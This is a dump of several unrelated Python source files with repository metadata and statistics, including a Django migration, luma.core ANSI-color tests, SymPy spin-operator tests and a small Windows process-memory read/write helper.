|
0
| 7
|
ccdef88b8ffb205aafe91409649c16fc474029de
| 117
|
py
|
Python
|
labs/space_station/solutions/tropiques.py
|
letstrythat/scientificpython
|
522bd70d66e4d985e5c22b1dc25b75f208910bb7
|
[
"MIT"
] | null | null | null |
labs/space_station/solutions/tropiques.py
|
letstrythat/scientificpython
|
522bd70d66e4d985e5c22b1dc25b75f208910bb7
|
[
"MIT"
] | null | null | null |
labs/space_station/solutions/tropiques.py
|
letstrythat/scientificpython
|
522bd70d66e4d985e5c22b1dc25b75f208910bb7
|
[
"MIT"
] | null | null | null |
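# A minimal setup sketch for the two lines below, which otherwise reference undefined
# names (earth, ts, sun); it assumes the Skyfield library and the 'de421.bsp' ephemeris,
# both of which are assumptions rather than something stated in the snippet itself.
from skyfield.api import load

ts = load.timescale()                  # timescale used to build the two dates
planets = load('de421.bsp')            # JPL ephemeris (downloaded on first use)
earth, sun = planets['earth'], planets['sun']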
print(earth.at(ts.utc(2017, 6, 21)).observe(sun).radec())
print(earth.at(ts.utc(2017, 12, 22)).observe(sun).radec())
| 39
| 58
| 0.675214
| 22
| 117
| 3.590909
| 0.590909
| 0.253165
| 0.303797
| 0.35443
| 0.531646
| 0.531646
| 0
| 0
| 0
| 0
| 0
| 0.135135
| 0.051282
| 117
| 2
| 59
| 58.5
| 0.576577
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
15e10ee88525ade30223670ab84756d962e6bcef
| 485
|
py
|
Python
|
tests/pyflakes_bears/pep8_naming_test_files/E07/valid.py
|
MacBox7/coala-pyflakes
|
637f8a2e77973384be79d30b0dae1f43072e60c8
|
[
"MIT"
] | null | null | null |
tests/pyflakes_bears/pep8_naming_test_files/E07/valid.py
|
MacBox7/coala-pyflakes
|
637f8a2e77973384be79d30b0dae1f43072e60c8
|
[
"MIT"
] | 12
|
2018-05-21T06:12:59.000Z
|
2018-07-30T10:37:16.000Z
|
tests/pyflakes_bears/pep8_naming_test_files/E07/valid.py
|
MacBox7/coala-pyflakes
|
637f8a2e77973384be79d30b0dae1f43072e60c8
|
[
"MIT"
] | 1
|
2018-06-10T16:16:47.000Z
|
2018-06-10T16:16:47.000Z
|
def __getattr__():
pass
class C1:
def __str__(self):
return ''
def foo(self):
'''
>>> class Good():
... def __str__(self):
... return 1
'''
pass
class C2:
if True:
def __str__(self):
return ''
class C3:
try:
if True:
while True:
def __str__(self):
return ''
break
except:
pass
| 16.166667
| 38
| 0.375258
| 42
| 485
| 3.857143
| 0.452381
| 0.148148
| 0.246914
| 0.395062
| 0.246914
| 0
| 0
| 0
| 0
| 0
| 0
| 0.017241
| 0.521649
| 485
| 29
| 39
| 16.724138
| 0.681034
| 0.134021
| 0
| 0.55
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0.15
| 0
| 0.15
| 0.55
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 7
|
c619731997551d719584d94379175a2b31ec3728
| 509
|
py
|
Python
|
test.py
|
itshoro/AniListPy
|
953c67dfa475c966c38b48b15e6e216a4b82b671
|
[
"MIT"
] | 1
|
2021-01-18T02:25:04.000Z
|
2021-01-18T02:25:04.000Z
|
test.py
|
itshoro/AniListPy
|
953c67dfa475c966c38b48b15e6e216a4b82b671
|
[
"MIT"
] | null | null | null |
test.py
|
itshoro/AniListPy
|
953c67dfa475c966c38b48b15e6e216a4b82b671
|
[
"MIT"
] | null | null | null |
# Query Animes
from anilistpy.test.test_queries import test_query_single_anime_by_id, test_query_single_anime_by_name, test_query_multiple_anime_by_ids
test_query_single_anime_by_id()
test_query_single_anime_by_name()
test_query_multiple_anime_by_ids()
# Query Manga
from anilistpy.test.test_queries import test_query_single_manga_by_id, test_query_single_manga_by_name, test_query_multiple_manga_by_ids
test_query_single_manga_by_id()
test_query_single_manga_by_name()
test_query_multiple_manga_by_ids()
| 33.933333
| 136
| 0.901768
| 88
| 509
| 4.511364
| 0.170455
| 0.27204
| 0.302267
| 0.201511
| 0.947103
| 0.947103
| 0.947103
| 0.947103
| 0.947103
| 0.775819
| 0
| 0
| 0.05501
| 509
| 14
| 137
| 36.357143
| 0.825364
| 0.047151
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.25
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
c63583c0dd206a233be1c1966187b01505d05bc0
| 437
|
py
|
Python
|
cupyx/scipy/ndimage/__init__.py
|
andersk/cupy
|
c73a325dd034ee9abfac2c4af11aa9107ec89042
|
[
"MIT"
] | 2
|
2020-02-28T09:27:58.000Z
|
2020-10-12T07:10:24.000Z
|
cupyx/scipy/ndimage/__init__.py
|
andersk/cupy
|
c73a325dd034ee9abfac2c4af11aa9107ec89042
|
[
"MIT"
] | null | null | null |
cupyx/scipy/ndimage/__init__.py
|
andersk/cupy
|
c73a325dd034ee9abfac2c4af11aa9107ec89042
|
[
"MIT"
] | null | null | null |
from cupyx.scipy.ndimage.filters import correlate # NOQA
from cupyx.scipy.ndimage.filters import convolve # NOQA
from cupyx.scipy.ndimage.interpolation import affine_transform # NOQA
from cupyx.scipy.ndimage.interpolation import map_coordinates # NOQA
from cupyx.scipy.ndimage.interpolation import rotate # NOQA
from cupyx.scipy.ndimage.interpolation import shift # NOQA
from cupyx.scipy.ndimage.interpolation import zoom # NOQA
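# A minimal usage sketch of the re-exported functions above; it assumes CuPy is
# installed with a working CUDA device, and the array values are illustrative only.
import cupy
import cupyx.scipy.ndimage as ndi

img = cupy.arange(25, dtype=cupy.float32).reshape(5, 5)
shifted = ndi.shift(img, (1, 0))              # translate down by one row
rotated = ndi.rotate(img, 45, reshape=False)  # rotate 45 degrees about the center
print(shifted.shape, rotated.shape)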
| 48.555556
| 70
| 0.82151
| 58
| 437
| 6.155172
| 0.293103
| 0.176471
| 0.27451
| 0.411765
| 0.817927
| 0.806723
| 0.616247
| 0
| 0
| 0
| 0
| 0
| 0.114416
| 437
| 8
| 71
| 54.625
| 0.922481
| 0.077803
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
c6552e7166dc303f7bf6d7787dfa0a79e9b62947
| 158
|
py
|
Python
|
bin/__init__.py
|
JackHumphries9/ida
|
a234484cdcd0e19612911b4f548ceb40bb22fad4
|
[
"MIT"
] | null | null | null |
bin/__init__.py
|
JackHumphries9/ida
|
a234484cdcd0e19612911b4f548ceb40bb22fad4
|
[
"MIT"
] | null | null | null |
bin/__init__.py
|
JackHumphries9/ida
|
a234484cdcd0e19612911b4f548ceb40bb22fad4
|
[
"MIT"
] | null | null | null |
from bin import core
from bin import _font
#from bin import _settings
from bin import _console
from bin import _packageManager
from bin import __tkinterp
| 26.333333
| 32
| 0.816456
| 24
| 158
| 5.125
| 0.375
| 0.341463
| 0.634146
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.177215
| 158
| 6
| 33
| 26.333333
| 0.946154
| 0.158228
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d695b9b6b6f2b2b5e78934445d5d03550dd3738d
| 3,717
|
py
|
Python
|
backend/stock/migrations/0005_auto_20210213_0207.py
|
fengxia41103/stock
|
1bba08f77e9038ebdd3905fe734bb51e5fb1bdf1
|
[
"MIT"
] | 1
|
2021-09-30T05:25:08.000Z
|
2021-09-30T05:25:08.000Z
|
backend/stock/migrations/0005_auto_20210213_0207.py
|
fengxia41103/stock
|
1bba08f77e9038ebdd3905fe734bb51e5fb1bdf1
|
[
"MIT"
] | 8
|
2021-09-30T05:27:09.000Z
|
2021-12-03T23:02:24.000Z
|
backend/stock/migrations/0005_auto_20210213_0207.py
|
fengxia41103/stock
|
1bba08f77e9038ebdd3905fe734bb51e5fb1bdf1
|
[
"MIT"
] | 3
|
2021-09-29T05:11:45.000Z
|
2021-10-31T07:26:31.000Z
|
# Generated by Django 3.1.6 on 2021-02-13 02:07
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('stock', '0004_incomestatement'),
]
operations = [
migrations.AlterField(
model_name='incomestatement',
name='ebit',
field=models.FloatField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='incomestatement',
name='general_and_administrative_expense',
field=models.FloatField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='incomestatement',
name='gross_profit',
field=models.FloatField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='incomestatement',
name='net_income',
field=models.FloatField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='incomestatement',
name='normalized_ebitda',
field=models.FloatField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='incomestatement',
name='normalized_income',
field=models.FloatField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='incomestatement',
name='on',
field=models.DateField(blank=True, null=True),
),
migrations.AlterField(
model_name='incomestatement',
name='operating_expense',
field=models.FloatField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='incomestatement',
name='operating_income',
field=models.FloatField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='incomestatement',
name='operating_revenue',
field=models.FloatField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='incomestatement',
name='pretax_income',
field=models.FloatField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='incomestatement',
name='reconciled_cost_of_revenue',
field=models.FloatField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='incomestatement',
name='research_and_development',
field=models.FloatField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='incomestatement',
name='selling_and_marketing_expense',
field=models.FloatField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='incomestatement',
name='selling_general_and_administration',
field=models.FloatField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='incomestatement',
name='total_expenses',
field=models.FloatField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='incomestatement',
name='total_operating_income_as_reported',
field=models.FloatField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='incomestatement',
name='total_revenue',
field=models.FloatField(blank=True, default=0, null=True),
),
]
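# Note (not part of the migration itself): a migration module like this is normally
# applied with `manage.py migrate stock`; the programmatic equivalent in Django is
# django.core.management.call_command('migrate', 'stock').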
| 35.740385
| 70
| 0.587033
| 341
| 3,717
| 6.260997
| 0.175953
| 0.168618
| 0.210773
| 0.244496
| 0.841218
| 0.841218
| 0.818735
| 0.818735
| 0.818735
| 0.78829
| 0
| 0.013836
| 0.299973
| 3,717
| 103
| 71
| 36.087379
| 0.806687
| 0.012107
| 0
| 0.731959
| 1
| 0
| 0.171117
| 0.049319
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.010309
| 0
| 0.041237
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
ba44d83bfc25ad50a02b744b06ec66399015e78f
| 4,046
|
py
|
Python
|
tests/test_ansi_color.py
|
jakiee3y/luma.core
|
713de8e4e397493dd196e8e7653268877135ffe9
|
[
"MIT"
] | 114
|
2017-01-13T16:06:46.000Z
|
2022-03-23T23:51:45.000Z
|
tests/test_ansi_color.py
|
plaes/luma.core
|
884b60de14becc5ee25798d48e4d83c56d228840
|
[
"MIT"
] | 192
|
2017-01-12T18:00:00.000Z
|
2022-02-20T22:38:31.000Z
|
tests/test_ansi_color.py
|
plaes/luma.core
|
884b60de14becc5ee25798d48e4d83c56d228840
|
[
"MIT"
] | 58
|
2017-01-21T13:54:03.000Z
|
2022-03-06T15:48:27.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2017-18 Richard Hull and contributors
# See LICENSE.rst for details.
"""
Tests for the :py:mod:`luma.core.ansi_color` module.
"""
import pytest
from luma.core import ansi_color
def test_parse_str_no_escape():
gen = ansi_color.parse_str("hello world")
assert next(gen) == ["putch", "h"]
assert next(gen) == ["putch", "e"]
assert next(gen) == ["putch", "l"]
assert next(gen) == ["putch", "l"]
assert next(gen) == ["putch", "o"]
assert next(gen) == ["putch", " "]
assert next(gen) == ["putch", "w"]
assert next(gen) == ["putch", "o"]
assert next(gen) == ["putch", "r"]
assert next(gen) == ["putch", "l"]
assert next(gen) == ["putch", "d"]
with pytest.raises(StopIteration):
next(gen)
def test_parse_str_valid_ansi_colors():
gen = ansi_color.parse_str("hello \033[31mworld\33[0m")
assert next(gen) == ["putch", "h"]
assert next(gen) == ["putch", "e"]
assert next(gen) == ["putch", "l"]
assert next(gen) == ["putch", "l"]
assert next(gen) == ["putch", "o"]
assert next(gen) == ["putch", " "]
assert next(gen) == ["foreground_color", "red"]
assert next(gen) == ["putch", "w"]
assert next(gen) == ["putch", "o"]
assert next(gen) == ["putch", "r"]
assert next(gen) == ["putch", "l"]
assert next(gen) == ["putch", "d"]
assert next(gen) == ["reset"]
with pytest.raises(StopIteration):
next(gen)
def test_parse_str_valid_ansi_colors_extended_codeset():
gen = ansi_color.parse_str(u"á \033[31mFußgänger Текст на\033[0m")
assert next(gen) == ["putch", u"á"]
assert next(gen) == ["putch", " "]
assert next(gen) == ["foreground_color", "red"]
assert next(gen) == ["putch", "F"]
assert next(gen) == ["putch", "u"]
assert next(gen) == ["putch", u"ß"]
assert next(gen) == ["putch", "g"]
assert next(gen) == ["putch", u"ä"]
assert next(gen) == ["putch", "n"]
assert next(gen) == ["putch", "g"]
assert next(gen) == ["putch", "e"]
assert next(gen) == ["putch", "r"]
assert next(gen) == ["putch", " "]
assert next(gen) == ["putch", u"Т"]
assert next(gen) == ["putch", u"е"]
assert next(gen) == ["putch", u"к"]
assert next(gen) == ["putch", u"с"]
assert next(gen) == ["putch", u"т"]
assert next(gen) == ["putch", " "]
assert next(gen) == ["putch", u"н"]
assert next(gen) == ["putch", u"а"]
assert next(gen) == ["reset"]
with pytest.raises(StopIteration):
next(gen)
def test_parse_str_multiple_ansi_colors():
gen = ansi_color.parse_str("hello \033[32;46mworld\33[7;0m")
assert next(gen) == ["putch", "h"]
assert next(gen) == ["putch", "e"]
assert next(gen) == ["putch", "l"]
assert next(gen) == ["putch", "l"]
assert next(gen) == ["putch", "o"]
assert next(gen) == ["putch", " "]
assert next(gen) == ["foreground_color", "green"]
assert next(gen) == ["background_color", "cyan"]
assert next(gen) == ["putch", "w"]
assert next(gen) == ["putch", "o"]
assert next(gen) == ["putch", "r"]
assert next(gen) == ["putch", "l"]
assert next(gen) == ["putch", "d"]
assert next(gen) == ["reverse_colors"]
assert next(gen) == ["reset"]
with pytest.raises(StopIteration):
next(gen)
def test_parse_str_unknown_ansi_colors_ignored():
gen = ansi_color.parse_str("hello \033[27mworld")
assert next(gen) == ["putch", "h"]
assert next(gen) == ["putch", "e"]
assert next(gen) == ["putch", "l"]
assert next(gen) == ["putch", "l"]
assert next(gen) == ["putch", "o"]
assert next(gen) == ["putch", " "]
assert next(gen) == ["putch", "w"]
assert next(gen) == ["putch", "o"]
assert next(gen) == ["putch", "r"]
assert next(gen) == ["putch", "l"]
assert next(gen) == ["putch", "d"]
with pytest.raises(StopIteration):
next(gen)
def test_strip_ansi_codes():
gen = ansi_color.strip_ansi_codes("hello \033[27mworld")
assert gen == "hello world"
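# A sketch of consuming parse_str output outside the tests: each yielded item is a
# directive list as exercised above (["putch", ch], ["foreground_color", name],
# ["background_color", name], ["reverse_colors"], ["reset"]); the render_plain()
# helper here is illustrative and not part of luma.core.
def render_plain(text):
    chars = []
    for directive, *args in ansi_color.parse_str(text):
        if directive == "putch":
            chars.append(args[0])   # printable character
        # color / reverse / reset directives would update drawing state instead
    return "".join(chars)


def test_render_plain_sketch():
    assert render_plain("hello \033[31mworld\33[0m") == "hello world"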
| 32.368
| 70
| 0.562037
| 537
| 4,046
| 4.141527
| 0.175047
| 0.242356
| 0.420863
| 0.517986
| 0.795863
| 0.733813
| 0.722572
| 0.709982
| 0.709982
| 0.621403
| 0
| 0.01408
| 0.210084
| 4,046
| 124
| 71
| 32.629032
| 0.68179
| 0.0435
| 0
| 0.680412
| 0
| 0
| 0.166364
| 0.006219
| 0
| 0
| 0
| 0
| 0.752577
| 1
| 0.061856
| false
| 0
| 0.020619
| 0
| 0.082474
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
242ac62761c06b934c502cbd6ac5177e563c1322
| 4,367
|
py
|
Python
|
rwmem/memory.py
|
iduel/ReadMem
|
a732405a12344b3cb8e42adade8f6bfb69be0435
|
[
"MIT"
] | null | null | null |
rwmem/memory.py
|
iduel/ReadMem
|
a732405a12344b3cb8e42adade8f6bfb69be0435
|
[
"MIT"
] | null | null | null |
rwmem/memory.py
|
iduel/ReadMem
|
a732405a12344b3cb8e42adade8f6bfb69be0435
|
[
"MIT"
] | null | null | null |
import ctypes
import rwmem.exception
def read_bytes(handle: int, address: int, bytes: int):
"""Read data from process memory.
Parameters:
-----------
handle: int
The handle to a process.
The handle must have the PROCESS_VM_READ access right.
address: int
The process's pointer to be read.
bytes: int
Number of bytes to be read.
Returns a list of hex-string byte values if succeeded.
"""
ascii = []
try:
read_buffer = ctypes.c_ubyte()
addr_buffer = ctypes.byref(read_buffer)
n_size = ctypes.sizeof(read_buffer)
lp_number_of_bytes_read = ctypes.c_ulong(0)
for i in range(bytes):
ctypes.windll.kernel32.ReadProcessMemory(handle, ctypes.c_void_p(address + i), addr_buffer, n_size, lp_number_of_bytes_read)
ascii.append(hex(read_buffer.value))
except (TypeError, ValueError, BufferError) as e:
raise rwmem.exception.WinAPIError(e) from e
else:
return ascii
def read_int(handle: int, address: int):
"""Read 4 bytes from process memory.
Parameters:
-----------
handle: int
The handle to a process.
The handle must have the PROCESS_VM_READ access right.
address: int
The process's pointer to be read.
Returns the raw value as int if succeeded.
"""
try:
read_buffer = ctypes.c_uint()
addr_buffer = ctypes.byref(read_buffer)
n_size = ctypes.sizeof(read_buffer)
lp_number_of_bytes_read = ctypes.c_ulong(0)
ctypes.windll.kernel32.ReadProcessMemory(handle, ctypes.c_void_p(address), addr_buffer, n_size, lp_number_of_bytes_read)
except (TypeError, ValueError, BufferError) as e:
raise rwmem.exception.WinAPIError(e) from e
else:
return read_buffer.value
def read_float(handle: int, address: int):
"""Read 4 bytes from process memory.
Parameters:
-----------
handle: int
The handle to a process.
The handle must have the PROCESS_VM_READ access right.
address: int
The process's pointer to be read.
Returns the raw value as float if succeeded.
"""
try:
read_buffer = ctypes.c_float()
addr_buffer = ctypes.byref(read_buffer)
n_size = ctypes.sizeof(read_buffer)
lp_number_of_bytes_read = ctypes.c_ulong(0)
ctypes.windll.kernel32.ReadProcessMemory(handle, ctypes.c_void_p(address), addr_buffer, n_size, lp_number_of_bytes_read)
except (TypeError, ValueError, BufferError) as e:
raise rwmem.exception.WinAPIError(e) from e
else:
return read_buffer.value
def read_double(handle: int, address: int):
try:
read_buffer = ctypes.c_double()
addr_buffer = ctypes.byref(read_buffer)
n_size = ctypes.sizeof(read_buffer)
lp_number_of_bytes_read = ctypes.c_ulong(0)
ctypes.windll.kernel32.ReadProcessMemory(handle, ctypes.c_void_p(address), addr_buffer, n_size, lp_number_of_bytes_read)
except (TypeError, ValueError, BufferError) as e:
raise rwmem.exception.WinAPIError(e) from e
else:
return read_buffer.value
def write_int(handle: int, address: int, value: str):
try:
for x in value:
write_buffer = ctypes.c_uint(int(x))
addr_buffer = ctypes.byref(write_buffer)
n_size = ctypes.sizeof(write_buffer)
lp_number_of_bytes_read = ctypes.c_ulong(0)
res = ctypes.windll.kernel32.WriteProcessMemory(handle, ctypes.c_void_p(address), addr_buffer, n_size, lp_number_of_bytes_read)
except (TypeError, ValueError, BufferError) as e:
raise rwmem.exception.WinAPIError(e) from e
else:
return bool(res)
def write_string(handle: int, address: int, value: str):
try:
write_buffer = ctypes.create_string_buffer(value.encode())
addr_buffer = ctypes.byref(write_buffer)
n_size = ctypes.sizeof(write_buffer)
lp_number_of_bytes_read = ctypes.c_size_t()
res = ctypes.windll.kernel32.WriteProcessMemory(handle, ctypes.c_void_p(address), addr_buffer, n_size, lp_number_of_bytes_read)
except (TypeError, ValueError, BufferError) as e:
raise rwmem.exception.WinAPIError(e) from e
else:
return bool(res)
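# A minimal Windows-only usage sketch; the pid and address are hypothetical, and the
# access-mask constants below are the standard Win32 values combining the rights the
# read/write helpers above rely on.
if __name__ == '__main__':
    PROCESS_VM_READ = 0x0010
    PROCESS_VM_WRITE = 0x0020
    PROCESS_VM_OPERATION = 0x0008

    pid = 1234                                    # hypothetical target process id
    handle = ctypes.windll.kernel32.OpenProcess(
        PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION, False, pid)
    if handle:
        print(read_int(handle, 0x10000000))       # hypothetical address
        ctypes.windll.kernel32.CloseHandle(handle)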
| 36.697479
| 139
| 0.665216
| 589
| 4,367
| 4.70798
| 0.14601
| 0.042914
| 0.060945
| 0.064912
| 0.862604
| 0.846015
| 0.846015
| 0.802019
| 0.802019
| 0.789758
| 0
| 0.006687
| 0.246622
| 4,367
| 118
| 140
| 37.008475
| 0.83617
| 0.191665
| 0
| 0.708333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0.027778
| 0
| 0.194444
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
24631535a0ca397a605dea5359e5e204ce0a2bcd
| 459,799
|
py
|
Python
|
sympy/physics/quantum/tests/test_spin.py
|
msgoff/sympy
|
1e7daef7514902f5e89718fa957b7b36c6669a10
|
[
"BSD-3-Clause"
] | null | null | null |
sympy/physics/quantum/tests/test_spin.py
|
msgoff/sympy
|
1e7daef7514902f5e89718fa957b7b36c6669a10
|
[
"BSD-3-Clause"
] | null | null | null |
sympy/physics/quantum/tests/test_spin.py
|
msgoff/sympy
|
1e7daef7514902f5e89718fa957b7b36c6669a10
|
[
"BSD-3-Clause"
] | null | null | null |
from sympy import cos, exp, expand, I, Matrix, pi, S, sin, sqrt, Sum, symbols, Rational
from sympy.abc import alpha, beta, gamma, j, m
from sympy.physics.quantum import hbar, represent, Commutator, InnerProduct
from sympy.physics.quantum.qapply import qapply
from sympy.physics.quantum.tensorproduct import TensorProduct
from sympy.physics.quantum.cg import CG
from sympy.physics.quantum.spin import (
Jx,
Jy,
Jz,
Jplus,
Jminus,
J2,
JxBra,
JyBra,
JzBra,
JxKet,
JyKet,
JzKet,
JxKetCoupled,
JyKetCoupled,
JzKetCoupled,
couple,
uncouple,
Rotation,
WignerD,
)
from sympy.testing.pytest import raises, slow
j1, j2, j3, j4, m1, m2, m3, m4 = symbols("j1:5 m1:5")
j12, j13, j24, j34, j123, j134, mi, mi1, mp = symbols(
"j12 j13 j24 j34 j123 j134 mi mi1 mp"
)
def test_represent_spin_operators():
assert represent(Jx) == hbar * Matrix([[0, 1], [1, 0]]) / 2
assert (
represent(Jx, j=1)
== hbar * sqrt(2) * Matrix([[0, 1, 0], [1, 0, 1], [0, 1, 0]]) / 2
)
assert represent(Jy) == hbar * I * Matrix([[0, -1], [1, 0]]) / 2
assert (
represent(Jy, j=1)
== hbar * I * sqrt(2) * Matrix([[0, -1, 0], [1, 0, -1], [0, 1, 0]]) / 2
)
assert represent(Jz) == hbar * Matrix([[1, 0], [0, -1]]) / 2
assert represent(Jz, j=1) == hbar * Matrix([[1, 0, 0], [0, 0, 0], [0, 0, -1]])
def test_represent_spin_states():
# Jx basis
assert represent(JxKet(S.Half, S.Half), basis=Jx) == Matrix([1, 0])
assert represent(JxKet(S.Half, Rational(-1, 2)), basis=Jx) == Matrix([0, 1])
assert represent(JxKet(1, 1), basis=Jx) == Matrix([1, 0, 0])
assert represent(JxKet(1, 0), basis=Jx) == Matrix([0, 1, 0])
assert represent(JxKet(1, -1), basis=Jx) == Matrix([0, 0, 1])
assert represent(JyKet(S.Half, S.Half), basis=Jx) == Matrix([exp(-I * pi / 4), 0])
assert represent(JyKet(S.Half, Rational(-1, 2)), basis=Jx) == Matrix(
[0, exp(I * pi / 4)]
)
assert represent(JyKet(1, 1), basis=Jx) == Matrix([-I, 0, 0])
assert represent(JyKet(1, 0), basis=Jx) == Matrix([0, 1, 0])
assert represent(JyKet(1, -1), basis=Jx) == Matrix([0, 0, I])
assert represent(JzKet(S.Half, S.Half), basis=Jx) == sqrt(2) * Matrix([-1, 1]) / 2
assert (
represent(JzKet(S.Half, Rational(-1, 2)), basis=Jx)
== sqrt(2) * Matrix([-1, -1]) / 2
)
assert represent(JzKet(1, 1), basis=Jx) == Matrix([1, -sqrt(2), 1]) / 2
assert represent(JzKet(1, 0), basis=Jx) == sqrt(2) * Matrix([1, 0, -1]) / 2
assert represent(JzKet(1, -1), basis=Jx) == Matrix([1, sqrt(2), 1]) / 2
# Jy basis
assert represent(JxKet(S.Half, S.Half), basis=Jy) == Matrix(
[exp(I * pi * Rational(-3, 4)), 0]
)
assert represent(JxKet(S.Half, Rational(-1, 2)), basis=Jy) == Matrix(
[0, exp(I * pi * Rational(3, 4))]
)
assert represent(JxKet(1, 1), basis=Jy) == Matrix([I, 0, 0])
assert represent(JxKet(1, 0), basis=Jy) == Matrix([0, 1, 0])
assert represent(JxKet(1, -1), basis=Jy) == Matrix([0, 0, -I])
assert represent(JyKet(S.Half, S.Half), basis=Jy) == Matrix([1, 0])
assert represent(JyKet(S.Half, Rational(-1, 2)), basis=Jy) == Matrix([0, 1])
assert represent(JyKet(1, 1), basis=Jy) == Matrix([1, 0, 0])
assert represent(JyKet(1, 0), basis=Jy) == Matrix([0, 1, 0])
assert represent(JyKet(1, -1), basis=Jy) == Matrix([0, 0, 1])
assert represent(JzKet(S.Half, S.Half), basis=Jy) == sqrt(2) * Matrix([-1, I]) / 2
assert (
represent(JzKet(S.Half, Rational(-1, 2)), basis=Jy)
== sqrt(2) * Matrix([I, -1]) / 2
)
assert represent(JzKet(1, 1), basis=Jy) == Matrix([1, -I * sqrt(2), -1]) / 2
assert (
represent(JzKet(1, 0), basis=Jy) == Matrix([-sqrt(2) * I, 0, -sqrt(2) * I]) / 2
)
assert represent(JzKet(1, -1), basis=Jy) == Matrix([-1, -sqrt(2) * I, 1]) / 2
# Jz basis
assert represent(JxKet(S.Half, S.Half), basis=Jz) == sqrt(2) * Matrix([1, 1]) / 2
assert (
represent(JxKet(S.Half, Rational(-1, 2)), basis=Jz)
== sqrt(2) * Matrix([-1, 1]) / 2
)
assert represent(JxKet(1, 1), basis=Jz) == Matrix([1, sqrt(2), 1]) / 2
assert represent(JxKet(1, 0), basis=Jz) == sqrt(2) * Matrix([-1, 0, 1]) / 2
assert represent(JxKet(1, -1), basis=Jz) == Matrix([1, -sqrt(2), 1]) / 2
assert represent(JyKet(S.Half, S.Half), basis=Jz) == sqrt(2) * Matrix([-1, -I]) / 2
assert (
represent(JyKet(S.Half, Rational(-1, 2)), basis=Jz)
== sqrt(2) * Matrix([-I, -1]) / 2
)
assert represent(JyKet(1, 1), basis=Jz) == Matrix([1, sqrt(2) * I, -1]) / 2
assert represent(JyKet(1, 0), basis=Jz) == sqrt(2) * Matrix([I, 0, I]) / 2
assert represent(JyKet(1, -1), basis=Jz) == Matrix([-1, sqrt(2) * I, 1]) / 2
